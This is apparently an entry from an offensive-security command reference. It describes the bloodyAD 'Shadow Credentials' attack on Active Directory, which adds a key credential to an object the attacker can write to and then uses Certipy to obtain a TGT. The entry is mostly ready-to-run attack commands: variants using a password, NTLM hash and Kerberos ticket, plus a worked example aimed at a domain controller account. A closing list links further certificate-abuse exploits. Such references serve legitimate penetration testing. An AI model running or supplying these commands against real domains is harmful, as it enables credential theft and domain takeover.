bloodyAD Shadow Credentials
Add a Key Credential (msDS-KeyCredentialLink) to a target object you have GenericWrite over. After this you can request a TGT for the target via PKINIT (Certipy auth -pfx) and pivot through the account. Cleaner replacement for Whisker.
- Tool
- bloodyAD
- Category
- Credential Attacks / ADCS (Certificate Abuse)
- Platform
- linux
- Requires
- password
- Protocols
- LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> add shadowCredentials <target>
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
bloodyAD --host <dc-ip> -d <domain> -u <user> -p :<hash> add shadowCredentials <target>
Kerberos Ticket requires Kerberos ticket
KRB5CCNAME=<ccache> bloodyAD --host <dc-fqdn> -d <domain> -u <user> -k add shadowCredentials <target>
Cleanup requires password
bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> remove shadowCredentials <target>
Examples
bloodyAD --host 10.10.10.10 -d corp.local -u jdoe -p 'Password123!' add shadowCredentials 'DC01$'
certipy auth -pfx <generated.pfx> -dc-ip 10.10.10.10
Tags
References
Related commands
- Certipy Account Operations Create, update, read, or delete user / computer accounts directly through Certipy.…
- Certipy Authenticate with Certificate Authenticate using a PFX certificate to obtain a TGT and NT hash
- Certipy CA Management Enumerate and manipulate the certificate authority itself: list officers (ESC7), backup…
- Certipy ESC1 (Subject in Request) Exploit ESC1: a template that allows the requester to specify a Subject Alternative Name…
- Certipy ESC11 (RPC Relay to ICPR) ESC11: ICertPassage RPC interface accepts NTLM without IF_ENFORCEENCRYPTICERTREQUEST.…
- Certipy ESC13 (OID Group Link) ESC13: a template's issuance policy is linked to a privileged group via…
- Certipy ESC14 (altSecurityIdentities Mapping) ESC14: weak explicit certificate mapping via altSecurityIdentities. With write access…
- Certipy ESC15 (Schema V1 EKUwu) ESC15 / EKUwu: schema v1 templates honor Application Policies from the CSR, letting an…